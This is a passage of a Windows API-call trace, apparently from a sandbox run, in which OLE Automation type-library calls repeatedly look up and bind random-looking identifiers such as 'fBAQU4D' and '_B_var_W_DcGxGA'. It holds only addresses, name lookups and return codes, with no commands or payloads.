pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.462] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2686, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="fBAQU4D") returned 8 [0068.462] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fBAQU4D", lHashVal=0x10a4ce, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2686, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="fBAQU4D") returned 8 [0068.462] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fBAQU4D", lHashVal=0x10a4ce, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2686, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="fBAQU4D") returned 8 [0068.462] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fBAQU4D", lHashVal=0x10a4ce, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fBAQU4D") returned 0x10a4ce [0068.463] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="fBAQU4D" | out: _Dst="fBAQU4D") returned 0x0 [0068.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="fBAQU4D") returned 8 [0068.463] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.463] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fBAQU4D", lHashVal=0x10a4ce, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.463] IUnknown:Release (This=0x665ba50) returned 0xb [0068.463] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.463] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="fBAQU4D", lHashVal=0x10a4ce, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.463] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.463] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.463] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fBAQU4D", lHashVal=0x10a4ce, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.463] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.463] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.463] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fBAQU4D", lHashVal=0x10a4ce, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.463] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2686, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="fBAQU4D") returned 8 [0068.463] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fBAQU4D", lHashVal=0x10a4ce, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.463] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.463] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba2686 | out: _Dst=0x67c2d60) returned 0x0 [0068.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fBAQU4D") returned 0x1098d1 [0068.463] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_fBAQU4D" | out: _Dst="_B_var_fBAQU4D") returned 0x0 [0068.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_fBAQU4D") returned 15 [0068.463] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.463] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fBAQU4D", lHashVal=0x1098d1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.463] IUnknown:Release (This=0x665ba50) returned 0xb [0068.463] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.463] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fBAQU4D", lHashVal=0x1098d1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.463] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.463] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.464] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fBAQU4D", lHashVal=0x1098d1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.464] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.464] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.464] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fBAQU4D", lHashVal=0x1098d1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.464] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.464] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.464] IUnknown:Release (This=0x665ba50) returned 0xb [0068.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1b7a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_fBAQU4D") returned 15 [0068.464] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fBAQU4D", lHashVal=0x1098d1, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x66005f00720061, ppTypeComp=0x55005100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x66005f00720061, ppTypeComp=0x55005100000000, pDummy=0x0) returned 0x0 [0068.464] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2686 | out: _Dst=0x145020) returned 0x0 [0068.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2776, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="W_DcGxGA") returned 9 [0068.464] ITypeComp:RemoteBind (in: This=0x665ba60, szName="W_DcGxGA", lHashVal=0x104358, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2776, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="W_DcGxGA") returned 9 [0068.464] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="W_DcGxGA", lHashVal=0x104358, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2776, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="W_DcGxGA") returned 9 [0068.464] ITypeComp:RemoteBind (in: This=0x665bd30, szName="W_DcGxGA", lHashVal=0x104358, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.464] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="W_DcGxGA") returned 0x104358 [0068.464] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="W_DcGxGA" | out: _Dst="W_DcGxGA") returned 0x0 [0068.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="W_DcGxGA") returned 9 [0068.464] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.464] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="W_DcGxGA", lHashVal=0x104358, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.465] IUnknown:Release (This=0x665ba50) returned 0xb [0068.465] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.465] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="W_DcGxGA", lHashVal=0x104358, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.465] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.465] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.465] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="W_DcGxGA", lHashVal=0x104358, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.465] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.465] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.465] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="W_DcGxGA", lHashVal=0x104358, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.465] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2776, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="W_DcGxGA") returned 9 [0068.465] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="W_DcGxGA", lHashVal=0x104358, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.465] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.465] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba2776 | out: _Dst=0x67c2d60) returned 0x0 [0068.465] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_W_DcGxGA") returned 0x101ae1 [0068.465] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_W_DcGxGA" | out: _Dst="_B_var_W_DcGxGA") returned 0x0 [0068.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_W_DcGxGA") returned 16 [0068.465] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.465] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_W_DcGxGA", lHashVal=0x101ae1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.465] IUnknown:Release (This=0x665ba50) returned 0xb [0068.465] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.465] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_W_DcGxGA", lHashVal=0x101ae1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.465] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.465] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.465] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_W_DcGxGA", lHashVal=0x101ae1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.465] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.465] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.465] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_W_DcGxGA", lHashVal=0x101ae1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.465] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.466] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.466] IUnknown:Release (This=0x665ba50) returned 0xb [0068.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1baa, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_W_DcGxGA") returned 16 [0068.466] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_W_DcGxGA", lHashVal=0x101ae1, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x57005f00720061, ppTypeComp=0x47006300000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x57005f00720061, ppTypeComp=0x47006300000000, pDummy=0x0) returned 0x0 [0068.466] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2776 | out: _Dst=0x145020) returned 0x0 [0068.466] ITypeComp:RemoteBind (in: This=0x665ba60, szName="A4UUQG1", lHashVal=0x109a54, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba274e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="A4UUQG1") returned 8 [0068.466] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="A4UUQG1", lHashVal=0x109a54, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba274e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="A4UUQG1") returned 8 [0068.466] ITypeComp:RemoteBind (in: This=0x665bd30, szName="A4UUQG1", lHashVal=0x109a54, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.466] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="A4UUQG1") returned 0x109a54 [0068.466] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="A4UUQG1" | out: _Dst="A4UUQG1") returned 0x0 [0068.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="A4UUQG1") returned 8 [0068.466] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.466] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="A4UUQG1", lHashVal=0x109a54, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.466] IUnknown:Release (This=0x665ba50) returned 0xb [0068.466] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.466] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="A4UUQG1", lHashVal=0x109a54, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.466] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.466] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.466] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="A4UUQG1", lHashVal=0x109a54, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.466] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.466] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.467] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="A4UUQG1", lHashVal=0x109a54, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.467] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba274e, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="A4UUQG1") returned 8 [0068.467] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="A4UUQG1", lHashVal=0x109a54, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.467] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.467] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba274e | out: _Dst=0x67c2d60) returned 0x0 [0068.467] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_A4UUQG1") returned 0x109dd8 [0068.467] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_A4UUQG1" | out: _Dst="_B_var_A4UUQG1") returned 0x0 [0068.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_A4UUQG1") returned 15 [0068.467] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.467] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_A4UUQG1", lHashVal=0x109dd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.467] IUnknown:Release (This=0x665ba50) returned 0xb [0068.467] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.467] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_A4UUQG1", lHashVal=0x109dd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.467] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.467] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.467] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_A4UUQG1", lHashVal=0x109dd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.467] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.467] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.467] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_A4UUQG1", lHashVal=0x109dd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.467] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.467] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.467] IUnknown:Release (This=0x665ba50) returned 0xb [0068.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1bda, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_A4UUQG1") returned 15 [0068.467] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_A4UUQG1", lHashVal=0x109dd8, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x41005f00720061, ppTypeComp=0x51005500000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x41005f00720061, ppTypeComp=0x51005500000000, pDummy=0x0) returned 0x0 [0068.467] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba274e | out: _Dst=0x145020) returned 0x0 [0068.467] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jkQ_AA", lHashVal=0x10d0ea, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba27ce, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="jkQ_AA") returned 7 [0068.468] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jkQ_AA", lHashVal=0x10d0ea, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba27ce, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="jkQ_AA") returned 7 [0068.468] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jkQ_AA", lHashVal=0x10d0ea, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.468] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jkQ_AA") returned 0x10d0ea [0068.468] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="jkQ_AA" | out: _Dst="jkQ_AA") returned 0x0 [0068.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="jkQ_AA") returned 7 [0068.468] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.468] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jkQ_AA", lHashVal=0x10d0ea, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.468] IUnknown:Release (This=0x665ba50) returned 0xb [0068.468] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.468] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jkQ_AA", lHashVal=0x10d0ea, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.468] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.468] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.468] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jkQ_AA", lHashVal=0x10d0ea, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.468] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.468] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.468] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jkQ_AA", lHashVal=0x10d0ea, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.468] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba27ce, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="jkQ_AA") returned 7 [0068.468] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jkQ_AA", lHashVal=0x10d0ea, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.468] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d60 [0068.468] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x7, _Src=0x3ba27ce | out: _Dst=0x67c2d60) returned 0x0 [0068.469] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jkQ_AA") returned 0x104b54 [0068.469] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_jkQ_AA" | out: _Dst="_B_var_jkQ_AA") returned 0x0 [0068.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_jkQ_AA") returned 14 [0068.469] 